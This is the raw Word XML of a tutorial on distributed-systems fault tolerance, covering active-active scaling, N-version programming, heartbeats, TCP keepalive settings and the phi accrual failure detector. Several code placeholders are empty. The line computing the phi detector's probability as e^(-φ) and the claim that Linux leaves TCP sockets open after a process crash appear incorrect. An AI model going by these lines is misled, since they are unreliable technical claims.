    </w:p>
    <w:p w14:paraId="081B3717" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D1572" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Consistency challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CC70B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Shared state across instances → coordination required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0CB5BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Stateless (HTTP application servers): trivial — no shared state to coordinate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4A8F1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Stateful (databases): requires distributed consensus or sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1EF81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E0C6C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Stateless active-active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF3591" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    N identical application servers behind load balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6ED91" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Any server can handle any request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4B11C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Session state: externalized to Redis or sticky sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B6C6A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB1843" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Benefits: N× throughput, any server failure → remaining handle load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9EC8FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Capacity: at 70% utilization normally, N-1 servers handle N's load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291551F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Must keep utilization &lt; (N-1)/N (e.g., 5 servers → max 80% normal utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B5D7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDFBA4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Active-Active database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BB91D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Multi-primary: all nodes accept writes → conflict resolution required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A97529" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Used by: Cassandra, DynamoDB, CouchDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0087C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6864B347" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Conflict resolution: LWW (Last Write Wins), CRDT, application-level merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3EA586" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Tradeoff: availability + write scalability ↔ consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060F3C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3273E025" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>N-Version Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226ACBA7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  N independent implementations of the same specification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761381D5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  All implementations run in parallel on same input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6568C31C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Voter: compares outputs, returns majority result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11F763" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C9895" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Theory: independent teams → independent bugs → faults don't correlate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688683A3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74F9A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reality: if teams use same language/library/framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2199612B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Implementation bugs often correlated (shared root cause)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143173A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "Common mode failure": same input causes same bug in all versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DCC7E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AD1EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Effective for: hardware fault tolerance (spacecraft, medical devices)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A23FD89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Used in: Airbus fly-by-wire (3 different implementations of flight computer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C25074" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           Nuclear reactor control systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06954A43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           Space Shuttle flight software (4 independent implementations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E90D5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69170076" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Less effective for: software faults where specification is ambiguous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32799AD7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                      (all teams interpret same ambiguity the same way)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35FA20" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="1B7ADD8F">
          <v:rect id="_x0000_i6440" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C99D86" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Detection — Knowing When Things Break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD2048" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heartbeats and Failure Detectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC34B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental challenge of failure detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EF9B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FDD164" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The impossibility of perfect failure detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556DE37" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  In asynchronous network: cannot distinguish crashed process from slow one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097CB9C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6ADB2A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Set timeout T:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066BCA4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    T too small: false positives (slow process declared dead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105FB17A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                 → unnecessary failovers → cascading failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42285D40" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    T too large: slow failure detection → long unavailability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E487A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F3D32" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  There is no "correct" T — it depends on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B8EF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Network latency distribution (p99, p999 latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09877CFC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Process response time distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD28353" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Acceptable false positive rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004CE57" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Acceptable detection latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C8226" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C9BB89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Heartbeat protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C1BEF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Sender: periodically send "I am alive" message at interval I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19387D43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Receiver: if no heartbeat received for timeout T:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A3A39" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            declare sender as suspected/dead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08701B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C175A7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB6A33" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    I = heartbeat interval (e.g., 1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5FAE6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    T = timeout threshold (e.g., 3 × I = 3 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46671143" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E0AA8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Tradeoffs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BBCEA2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Shorter I: faster detection, more network traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F30395" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Longer T: fewer false positives, slower detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD1FBA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17100A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  TCP keepalive (OS-level heartbeat):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF3802" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    TCP_KEEPALIVE_INTERVAL: seconds between keepalives (default: 75s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A47F9D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    TCP_KEEPALIVE_TIME: idle time before starting keepalives (default: 7200s!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C09089" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    TCP_KEEPALIVE_COUNT: retries before declaring dead (default: 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6075C430" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F45F59" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Default: 7200s + 9×75s = 7,875 seconds = 2.2 hours to detect dead TCP connection!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FAA11D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Production systems: override with much shorter values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03AFD2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      TCP_KEEPALIVE_TIME = 30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D06C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      TCP_KEEPALIVE_INTERVAL = 5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16799A98" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      TCP_KEEPALIVE_COUNT = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C89B1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      → Dead connection detected in 30 + 3×5 = 45 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB284A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E356251" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Application-level heartbeats: more reliable than TCP keepalive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1109A98D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Set at 10-30 second intervals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA3DE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Control detection latency precisely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E55276" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Detect: remote process crash even if TCP connection stays open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19992B4C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">               (Linux doesn't immediately close TCP sockets on process crash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241EBF74" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Phi Accrual Failure Detector (used by Cassandra, Akka):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA38B7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2B767A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem with threshold-based detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D2360" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fixed threshold T → binary decision: alive or dead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2F9DC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  No measure of confidence in the decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E683A8D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Different network conditions → same threshold may be too strict or too lenient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9AED97" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599A6CE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Phi Accrual Failure Detector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0E45B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Instead of binary decision: output phi (φ) — a continuous suspicion level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216567C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  φ = 1: process probably alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A11C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  φ = 10: very likely dead (probability of being alive ≈ e^(-φ) ≈ 0.0000454)</w:t>
      </w:r>
    </w:p>
